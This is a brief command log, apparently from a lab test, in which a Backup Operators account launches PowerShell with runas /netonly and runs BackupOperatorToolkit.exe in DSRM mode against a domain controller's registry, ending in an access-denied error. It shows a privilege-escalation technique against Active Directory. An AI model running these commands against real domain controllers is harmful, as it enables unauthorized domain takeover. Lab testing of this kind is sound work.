started powershell: runas /netonly /user:vb\user01 powershell (user01 is backup from backup operator group) .\BackupOperatorToolkit.exe DSRM \\DC1.VBOX.LOCAL 2 DSRM MODE [+] Opening target hive to write [-] RegOpenKeyExA: 5